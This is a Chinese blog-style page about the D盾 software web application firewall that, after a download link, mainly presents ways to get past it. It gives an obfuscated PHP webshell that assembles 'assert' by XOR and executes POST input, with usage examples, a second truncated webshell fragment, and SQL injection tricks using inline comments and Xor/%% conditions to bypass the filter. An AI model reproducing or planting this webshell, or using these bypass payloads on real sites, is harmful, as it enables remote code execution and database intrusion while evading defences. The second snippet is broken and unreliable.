V2AS问路
应用安全-安全设备-Waf系列-软Waf-D盾
阅读原文时间:2023年07月15日阅读:2

安装

下载
http://www.d99net.net/down/d_safe_2.1.5.2.zip

使用说明

http://www.d99net.net/News.asp?id=106

免杀

array_map |  assert

mb_substr

PHP一句话

class LTDS
{
public function __destruct()
{
$bxo='X'^"\x39";
$woa='?'^"\x4c";
$ukt='K'^"\x38";
$gud='d'^"\x1";
$fbu='_'^"\x2d";
$agx='<'^"\x48"; $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx; return @$HLWV($this->OX);
}
}
$ltds=new LTDS();
@$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8'];

http://www.xxx.com/shell.php
POST: ua8=phpinfo(); //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随意更改)
POST: ua8=cGhwaW5mbygpOwo= //payload的base64编码

异或 | PHP一句话

c);
}
}
$zxvg=new ZXVG();
@$zxvg->c=$_POST['mr6'];

注入绕过

()
and =1和and =

()
%% True 和 %% False

()
Xor True 和 Xor False

()
http://127.0.0.1/sqli.php?id=1/**//*!order*//**//*!by*//**//*!1*/ #order by 内联

()
union select 内联

()
盲注

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章

蚂蚁金服Service Mesh新型网络代理的思考与实践
每个后端都应该了解的OpenResty入门以及网关安全实战
Web应用防火墙--规则防护

4

一款国产开源 Web 防火墙神器!